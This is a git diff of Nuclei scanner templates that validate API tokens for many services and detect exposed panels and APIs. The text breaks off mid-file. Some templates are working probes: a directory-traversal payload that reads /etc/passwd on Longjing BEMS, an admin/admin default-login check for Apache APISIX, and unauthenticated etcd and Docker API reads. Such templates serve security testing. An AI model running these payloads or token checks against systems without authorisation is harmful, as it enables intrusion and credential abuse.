0000000000..ee518e36b4 --- /dev/null +++ b/poc/api/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/poc/api/api-square-496.yaml b/poc/api/api-square.yaml similarity index 100% rename from poc/api/api-square-496.yaml rename to poc/api/api-square.yaml diff --git a/poc/api/api-sslmate-497.yaml b/poc/api/api-sslmate-497.yaml deleted file mode 100644 index fb16c14d37..0000000000 --- a/poc/api/api-sslmate-497.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-sslmate - -info: - name: SSLMate API Test - author: 0ri2N - severity: info - reference: - - https://sslmate.com - - https://sslmate.com/help/ - - https://sslmate.com/help/reference/apiv2 - metadata: - max-request: 1 - tags: recon,sslmate,token-spray - -self-contained: true - -http: - - method: GET - path: - - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"exists"' - - '"wildcard"' - - '"auto_renew"' - condition: and - -# digest: 4b0a00483046022100f525c91b3e36151f292b0cb01a0b9ad0bf6dd0f6088aafbc251e3dc1b0d969a5022100e5dd93fe9b0cc75f56993b261f9b495cf086391c542d615a0edcf3d297075431:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-sslmate.yaml b/poc/api/api-sslmate.yaml new file mode 100644 index 0000000000..940d325e12 --- /dev/null +++ b/poc/api/api-sslmate.yaml @@ -0,0 +1,28 @@ +id: api-sslmate + +info: + name: SSLMate API Test + author: 0ri2N + severity: info + reference: + - https://sslmate.com + - https://sslmate.com/help/ + - https://sslmate.com/help/reference/apiv2 + tags: dns,ssl,recon,sslmate,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://sslmate.com/api/v2/certs/example.com?expand=current.crt + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"exists"' + - '"wildcard"' + - '"auto_renew"' + condition: and diff --git a/poc/api/api-stripe-499.yaml b/poc/api/api-stripe-499.yaml deleted file mode 100644 index d06b38bd8c..0000000000 --- a/poc/api/api-stripe-499.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-stripe - -info: - name: Stripe API Test - author: zzeitlin - severity: info - reference: https://stripe.com/docs/api/authentication - tags: token-spray,stripe - -self-contained: true -requests: - - method: GET - path: - - "https://api.stripe.com/v1/charges" - headers: - Authorization: Basic {{base64(token + ':')}} - - matchers: - - type: word - part: body - words: - - '"object":' - - '"url":' - - '"data":' - condition: and \ No newline at end of file diff --git a/poc/api/api-stripe.yaml b/poc/api/api-stripe.yaml index 16e358e75a..d06b38bd8c 100644 --- a/poc/api/api-stripe.yaml +++ b/poc/api/api-stripe.yaml @@ -3,10 +3,11 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/poc/api/api-taiga-501.yaml b/poc/api/api-taiga-501.yaml deleted file mode 100644 index 813c76f3ea..0000000000 --- a/poc/api/api-taiga-501.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-taiga - -info: - name: Taiga API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.taiga.io/api.html - metadata: - max-request: 1 - tags: token-spray,taiga - -self-contained: true - -http: - - method: GET - path: - - "https://api.taiga.io/api/v1/application-tokens" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"auth_code":' - - '"state":' - condition: and - -# digest: 4b0a00483046022100bf3ead9df9b8a73d035d356ac82460543b9f33a6ba786736564746301d5c75b1022100a498eba13eb325a9e2ecf7d1fe784b5598bb024e888df4601a928c19c9bb2f16:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-taiga.yaml b/poc/api/api-taiga.yaml new file mode 100644 index 0000000000..6e8748bdf1 --- /dev/null +++ b/poc/api/api-taiga.yaml @@ -0,0 +1,24 @@ +id: api-taiga + +info: + name: Taiga API Test + author: dwisiswant0 + reference: https://docs.taiga.io/api.html + severity: info + tags: token-spray,taiga + +self-contained: true +requests: + - method: GET + path: + - "https://api.taiga.io/api/v1/application-tokens" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"auth_code":' + - '"state":' + condition: and diff --git a/poc/api/api-thecatapi-502.yaml b/poc/api/api-thecatapi-502.yaml deleted file mode 100644 index 5c689a18b9..0000000000 --- a/poc/api/api-thecatapi-502.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: api-thecatapi - -info: - name: TheCatApi API Test - author: daffainfo - severity: info - description: Pictures of cats from Tumblr - reference: - - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi - metadata: - max-request: 1 - tags: token-spray,thecatapi - -self-contained: true - -http: - - method: GET - path: - - "https://api.thecatapi.com/v1/votes" - - headers: - x-api-key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"country_code":' - - '"created_at":' - condition: and - -# digest: 4b0a00483046022100e6d911ecb61631f9a18c965d18dfc50dc2c659696e07e35a066bea1998874a88022100a26e89623b58680d7e1e34cbc3b0d86c5e4a454222c75003848955186cfa288b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-thecatapi-503.yaml b/poc/api/api-thecatapi-503.yaml index 0eb02cde29..54740e47d8 100644 --- a/poc/api/api-thecatapi-503.yaml +++ b/poc/api/api-thecatapi-503.yaml @@ -4,10 +4,9 @@ info: name: TheCatApi API Test author: daffainfo severity: info - description: Pictures of cats from Tumblr reference: - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md tags: token-spray,thecatapi self-contained: true @@ -22,6 +21,7 @@ requests: - type: word part: body words: - - '"country_code":' - - '"created_at":' - condition: and \ No newline at end of file + - 'id":' + - 'image_id":' + - 'sub_id":' + condition: and diff --git a/poc/api/api-tink-504.yaml b/poc/api/api-tink-504.yaml deleted file mode 100644 index 7b16f84077..0000000000 --- a/poc/api/api-tink-504.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-tink - -info: - name: Tink API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.tink.com/api - metadata: - max-request: 1 - tags: token-spray,tink - -self-contained: true - -http: - - method: GET - path: - - "https://api.tink.com/api/v1/user" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - "appId" - - "externalUserId" - - "username" - condition: and - -# digest: 490a00463044022064bc122a937a39b63ea026801501211eec64ce7aa8adc30f055b2b4c87e69928022010d864dc724658ccf145c743989d9e1ea361b506b53e6d909eaeee6850ee8447:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-tink.yaml b/poc/api/api-tink.yaml new file mode 100644 index 0000000000..a7c5de8ccd --- /dev/null +++ b/poc/api/api-tink.yaml @@ -0,0 +1,25 @@ +id: api-tink + +info: + name: Tink API Test + author: dwisiswant0 + reference: https://docs.tink.com/api + severity: info + tags: token-spray,tink + +self-contained: true +requests: + - method: GET + path: + - "https://api.tink.com/api/v1/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "appId" + - "externalUserId" + - "username" + condition: and diff --git a/poc/api/api-travisci.yaml b/poc/api/api-travisci.yaml deleted file mode 100644 index 5212516fc1..0000000000 --- a/poc/api/api-travisci.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-travisci - -info: - name: Travis CI API Test - author: zzeitlin - reference: https://developer.travis-ci.com/ - severity: info - tags: token-spray,travis - -requests: - - method: GET - path: - - "https://api.travis-ci.com/user" - headers: - Travis-API-Version: 3 - Authorization: token {{token}} - - matchers: - - type: status - status: - - 403 - negative: true diff --git a/poc/api/api-virustotal-511.yaml b/poc/api/api-virustotal-511.yaml index fbcb6e2600..0c039312df 100644 --- a/poc/api/api-virustotal-511.yaml +++ b/poc/api/api-virustotal-511.yaml @@ -6,11 +6,14 @@ info: severity: info reference: - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md + metadata: + max-request: 1 tags: token-spray,virustotal self-contained: true -requests: + +http: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -24,7 +27,9 @@ requests: - type: word part: body words: - - "'verbose_msg':" - - "'scan_date':" - - "'permalink':" + - '"verbose_msg":' + - '"scan_date":' + - '"permalink":' condition: and + +# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-virustotal-512.yaml b/poc/api/api-virustotal-512.yaml index 0c039312df..f48595c162 100644 --- a/poc/api/api-virustotal-512.yaml +++ b/poc/api/api-virustotal-512.yaml @@ -7,13 +7,10 @@ info: reference: - https://developers.virustotal.com/reference - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - metadata: - max-request: 1 tags: token-spray,virustotal self-contained: true - -http: +requests: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -27,9 +24,7 @@ http: - type: word part: body words: - - '"verbose_msg":' - - '"scan_date":' - - '"permalink":' + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" condition: and - -# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-visualstudio-513.yaml b/poc/api/api-visualstudio-513.yaml deleted file mode 100644 index a05d17e57a..0000000000 --- a/poc/api/api-visualstudio-513.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-visualstudio - -info: - name: Visual Studio API Test - author: zzeitlin - reference: https://openapi.appcenter.ms/ - severity: info - tags: token-spray,visualstudio,microsoft - -requests: - - method: GET - path: - - "https://api.appcenter.ms/v0.1/apps" - headers: - Content-Type: application/json - X-Api-Token: "{{token}}" - - matchers: - - type: word - part: body - negative: true - words: - - 'Unauthorized' diff --git a/poc/api/api-visualstudio.yaml b/poc/api/api-visualstudio.yaml new file mode 100644 index 0000000000..a3440fdb9a --- /dev/null +++ b/poc/api/api-visualstudio.yaml @@ -0,0 +1,26 @@ +id: api-visualstudio + +info: + name: Visual Studio API Test + author: zzeitlin + severity: info + reference: https://openapi.appcenter.ms/ + tags: token-spray,visualstudio,microsoft + +self-contained: true +requests: + - method: GET + path: + - "https://api.appcenter.ms/v0.1/apps" + headers: + Content-Type: application/json + X-Api-Token: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"description":' + - '"owner":' + condition: and diff --git a/poc/api/api-wakatime-514.yaml b/poc/api/api-wakatime-514.yaml index b48ed5e79f..07755c952b 100644 --- a/poc/api/api-wakatime-514.yaml +++ b/poc/api/api-wakatime-514.yaml @@ -3,17 +3,21 @@ id: api-wakatime info: name: WakaTime CI API Test author: zzeitlin - reference: https://wakatime.com/developers severity: info + reference: https://wakatime.com/developers tags: token-spray,wakatime +self-contained: true requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"data":' + - '"seconds":' + - '"is_up_to_date":' + condition: and diff --git a/poc/api/api-wakatime.yaml b/poc/api/api-wakatime.yaml new file mode 100644 index 0000000000..b48ed5e79f --- /dev/null +++ b/poc/api/api-wakatime.yaml @@ -0,0 +1,19 @@ +id: api-wakatime + +info: + name: WakaTime CI API Test + author: zzeitlin + reference: https://wakatime.com/developers + severity: info + tags: token-spray,wakatime + +requests: + - method: GET + path: + - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + + matchers: + - type: status + status: + - 401 + negative: true diff --git a/poc/api/api-weglot-516.yaml b/poc/api/api-weglot-516.yaml deleted file mode 100644 index 37e6b647ef..0000000000 --- a/poc/api/api-weglot-516.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-weglot - -info: - name: WeGlot API Test - author: zzeitlin - reference: https://developers.weglot.com/api/reference - severity: info - tags: token-spray,weglot - -self-contained: true -requests: - - method: POST - path: - - "https://api.weglot.com/translate?api_key={{token}}" - headers: - Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - - matchers: - - type: word - part: body - negative: true - words: - - 'does not exist' diff --git a/poc/api/api-weglot.yaml b/poc/api/api-weglot.yaml index 9c1a8e2874..37e6b647ef 100644 --- a/poc/api/api-weglot.yaml +++ b/poc/api/api-weglot.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,weglot +self-contained: true requests: - method: POST path: diff --git a/poc/api/api-wordcloud-517.yaml b/poc/api/api-wordcloud-517.yaml deleted file mode 100644 index 860ab73d73..0000000000 --- a/poc/api/api-wordcloud-517.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: api-wordcloud - -info: - name: Word Cloud API Test - author: daffainfo - severity: info - reference: - - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md - tags: token-spray,wordcloud - -self-contained: true -requests: - - raw: - - | - POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 - Host: textvis-word-cloud-v1.p.rapidapi.com - content-type: application/json - x-rapidapi-host: textvis-word-cloud-v1.p.rapidapi.com - x-rapidapi-key: {{token}} - Content-Length: 349 - - { - "text": "This is a test. I repeat, this is a test. We are only testing the functionality of this api, nothing else. End of test.", - "scale": 0.5, - "width": 400, - "height": 400, - "colors": [ - "#375E97", - "#FB6542", - "#FFBB00", - "#3F681C" - ], - "font": "Tahoma", - "use_stopwords": true, - "language": "en", - "uppercase": false - } - - matchers: - - type: word - part: body - negative: true - words: - - '{"message":"You are not subscribed to this API."}' diff --git a/poc/api/api-wordcloud-518.yaml b/poc/api/api-wordcloud-518.yaml index 3f274ce4b7..860ab73d73 100644 --- a/poc/api/api-wordcloud-518.yaml +++ b/poc/api/api-wordcloud-518.yaml @@ -4,17 +4,13 @@ info: name: Word Cloud API Test author: daffainfo severity: info - description: Easily create word clouds reference: - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/tree/main/word-cloud - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md tags: token-spray,wordcloud self-contained: true - -http: +requests: - raw: - | POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 @@ -47,5 +43,3 @@ http: negative: true words: - '{"message":"You are not subscribed to this API."}' - -# digest: 4a0a0047304502200bb686f7740c3aa0631d8eff8a8c27854fef6f4e1c638d8a3075d1fd01dd81cb022100abe7621b7beb6ed80118f7f668d8151b8e45ec1fd802602bf80c4786332259f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube-519.yaml b/poc/api/api-youtube-519.yaml deleted file mode 100644 index 832da305b5..0000000000 --- a/poc/api/api-youtube-519.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-youtube - -info: - name: YouTube API Test - author: zzeitlin - severity: info - reference: - - https://developers.google.com/youtube/v3/docs - metadata: - max-request: 1 - tags: token-spray,youtube - -self-contained: true - -http: - - method: GET - path: - - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"kind":' - - '"pageInfo":' - condition: and - -# digest: 4a0a004730450220736a86ef95feb0ef762e9857642ccf941afac2f9ea6920782f88724f5516128a02210099195000f3743f6b553cc99c71c70456c8160e1ff2acdd21fc5d54104a1df927:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube.yaml b/poc/api/api-youtube.yaml new file mode 100644 index 0000000000..be1531a453 --- /dev/null +++ b/poc/api/api-youtube.yaml @@ -0,0 +1,22 @@ +id: api-youtube + +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: token-spray,youtube + +self-contained: true +requests: + - method: GET + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + + matchers: + - type: word + part: body + words: + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file diff --git a/poc/api/apiman-panel-460.yaml b/poc/api/apiman-panel-460.yaml index 72c5d57fcc..85b65e14e6 100644 --- a/poc/api/apiman-panel-460.yaml +++ b/poc/api/apiman-panel-460.yaml @@ -5,15 +5,16 @@ info: author: righettod severity: info description: An Apiman instance was detected via the login redirection. + tags: panel,apiman reference: - https://www.apiman.io/latest/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,apiman -http: +requests: - method: GET path: - "{{BaseURL}}/apimanui/api-manager" @@ -29,4 +30,4 @@ http: status: - 302 -# digest: 4b0a00483046022100b79ecda1929aedc281bad1fc900d632afc56bb2305a46933fc7a7d3446a2e2cd022100d538233edfb8d9c36e38b1188932e0de90768e3f35b8cc44b8f308026a7702f4:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apiman-panel-462.yaml b/poc/api/apiman-panel-462.yaml deleted file mode 100644 index 24bbf1f89b..0000000000 --- a/poc/api/apiman-panel-462.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apiman-panel - -info: - name: Apiman Login Panel - author: righettod - severity: info - description: An Apiman instance was detected via the login redirection. - reference: - - https://www.apiman.io/latest/ - classification: - cwe-id: CWE-200 - tags: panel,apiman - -requests: - - method: GET - path: - - "{{BaseURL}}/apimanui/api-manager" - - matchers-condition: and - matchers: - - type: word - words: - - "/auth/realms/apiman" - part: header - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apisix-default-login-492.yaml b/poc/api/apisix-default-login-492.yaml index cb4e83e6df..c16b0c60b1 100644 --- a/poc/api/apisix-default-login-492.yaml +++ b/poc/api/apisix-default-login-492.yaml @@ -1,22 +1,13 @@ id: apisix-default-login - info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Default Login author: pdteam - severity: high - description: An Apache Apisix default admin login was discovered. + severity: critical + tags: apisix,apache,default-login metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org - reference: - - https://apisix.apache.org/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: apisix,apache,default-login - requests: - raw: - | @@ -27,25 +18,20 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - admin - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data"' - '"token"' - '"code":0' condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..f230552dbc 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -1,20 +1,19 @@ id: arcgis-rest-api info: - name: ArcGIS Exposed Docs + name: ArcGIS Exposed REST API documentation author: Podalirius severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms + description: ArcGIS REST API documentation was discovered. reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + max-request: 1 + tags: api,arcgis,cms,panel -requests: +http: - method: GET path: - '{{BaseURL}}/server/sdk/rest/index.html' @@ -29,4 +28,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/20 +# digest: 4a0a0047304502206b9563fbbf34d888667c10a8a5a4dce68e81457f47edd26ab854c267c949e70f022100859b421e5c7a575e8f595314487d7ece97c9e8badc0129c5b368ad86cd8f50b6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/bems-api-lfi-709.yaml b/poc/api/bems-api-lfi-709.yaml deleted file mode 100644 index fa2efedbb9..0000000000 --- a/poc/api/bems-api-lfi-709.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: bems-api-lfi - -info: - name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/api/bems-api-lfi-711.yaml b/poc/api/bems-api-lfi-711.yaml index 906ed1fe4d..dfde5d648f 100644 --- a/poc/api/bems-api-lfi-711.yaml +++ b/poc/api/bems-api-lfi-711.yaml @@ -1,22 +1,14 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Local File Inclusion + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download author: gy741 severity: high - description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - - https://packetstormsecurity.com/files/163702/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 1 - tags: lfi,packetstorm + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi -http: +requests: - method: GET path: - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" @@ -25,10 +17,8 @@ http: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# digest: 4b0a00483046022100c23364bc1edb9b12d6360534784f7909102eaa2b7d6ade0a4ec84cf5d45acc55022100ce9a9757a3391cd8fd9287eb0bb043335ba1dea6c218aef73d2bb6828a37781e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/bems-api-lfi-712.yaml b/poc/api/bems-api-lfi-712.yaml deleted file mode 100644 index dfde5d648f..0000000000 --- a/poc/api/bems-api-lfi-712.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: bems-api-lfi - -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/api/burp-api-detect-810.yaml b/poc/api/burp-api-detect-810.yaml new file mode 100644 index 0000000000..d1c703aa98 --- /dev/null +++ b/poc/api/burp-api-detect-810.yaml @@ -0,0 +1,28 @@ +id: burp-rest-api-detect + +info: + name: Burp Rest API Server Running + author: joanbono + severity: info + reference: + - https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech + +requests: + - method: GET + path: + - "{{BaseURL}}/v0.1/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Burp API' + part: body + - type: word + words: + - 'X-Burp-Version' + part: header + - type: status + status: + - 200 diff --git a/poc/api/burp-api-detect-812.yaml b/poc/api/burp-api-detect-812.yaml deleted file mode 100644 index 10cc8bcac8..0000000000 --- a/poc/api/burp-api-detect-812.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: burp-rest-api-detect - -info: - name: Burp Rest API Server Running - author: joanbono - severity: info - reference: https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/v0.1/" - - matchers-condition: and - matchers: - - type: word - words: - - 'Burp API' - part: body - - type: word - words: - - 'X-Burp-Version' - part: header - - type: status - status: - - 200 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml index d1c703aa98..10cc8bcac8 100644 --- a/poc/api/burp-api-detect.yaml +++ b/poc/api/burp-api-detect.yaml @@ -4,8 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference + reference: https://portswigger.net/burp/documentation/enterprise/api-reference tags: burp,tech requests: diff --git a/poc/api/etcd-unauthenticated-api.yaml b/poc/api/etcd-unauthenticated-api.yaml index b41d5c896c..1c523c0a06 100644 --- a/poc/api/etcd-unauthenticated-api.yaml +++ b/poc/api/etcd-unauthenticated-api.yaml @@ -1,40 +1,28 @@ id: http-etcd-unauthenticated-api-data-leak - info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high - reference: - - https://hackerone.com/reports/1088429 - metadata: - max-request: 1 - tags: misconfig,hackerone,unauth,etcd - -http: + reference: https://hackerone.com/reports/1088429 + tags: unauth +requests: - method: GET path: - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and matchers: - type: word - part: body words: - '"roles"' - '"permissions"' - '"role"' - '"kv"' condition: and - + part: body + - type: status + status: + - 200 - type: word part: header words: - "text/plain" - - "application/json" - condition: or - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100897d3dde5e9a2dfd0ab7d17ab781c555d44ad28bc754236ec6bf33a7ec4c0d7c022100f5ba5418fa82fa65ff1d95bedc9dffea5b1861016c575cc71e7898fbd6c8a3ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-docker-api-7299.yaml b/poc/api/exposed-docker-api-7299.yaml index 527544a236..f3b973ca86 100644 --- a/poc/api/exposed-docker-api-7299.yaml +++ b/poc/api/exposed-docker-api-7299.yaml @@ -2,13 +2,11 @@ id: exposed-docker-api info: name: Exposed Docker API - author: furkansenan,dwisiswant0 + author: furkansenan & dwisiswant0 severity: info - metadata: - max-request: 2 - tags: docker,unauth,devops,misconfig + tags: docker,unauth,devops -http: +requests: - method: GET path: - "http://{{Hostname}}/version" @@ -20,16 +18,12 @@ http: words: - "application/json" part: header - - type: word words: - "KernelVersion" - "BuildTime" condition: and part: body - - type: status status: - 200 - -# digest: 490a0046304402203efb60ca5cd72b8e84389f1f375a834b8f2b7249a37ebb17fcf1fe352301abc402202547c7d3f2bcbd803a4dc349cb4d6d4a0b41f5915aa09c6b3216b504f6714566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-glances-api-7308.yaml b/poc/api/exposed-glances-api-7308.yaml index d1028e6dd8..e00fe91045 100644 --- a/poc/api/exposed-glances-api-7308.yaml +++ b/poc/api/exposed-glances-api-7308.yaml @@ -1,27 +1,29 @@ -id: exposed-glances-api -info: - name: Exposed Glances API - author: princechaddha - severity: low - description: Glances is a cross-platform system monitoring tool written in Python. - reference: https://nicolargo.github.io/glances/ - tags: glances,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'title">Glances' - - 'glances.config' - - '' - part: body - condition: and +id: exposed-glances-api + +info: + name: Exposed Glances API + author: princechaddha + severity: low + description: Glances is a cross-platform system monitoring tool written in Python. + reference: + - https://nicolargo.github.io/glances/ + tags: glances,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'title">Glances' + - 'glances.config' + - '' + part: body + condition: and diff --git a/poc/api/fastapi-docs-7398.yaml b/poc/api/fastapi-docs-7398.yaml new file mode 100644 index 0000000000..e0925b7940 --- /dev/null +++ b/poc/api/fastapi-docs-7398.yaml @@ -0,0 +1,22 @@ +id: fastapi-docs + +info: + name: FastAPI Docs + author: github.com/its0x08 + severity: info + tags: fastapi,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + + matchers: + - type: word + words: + - 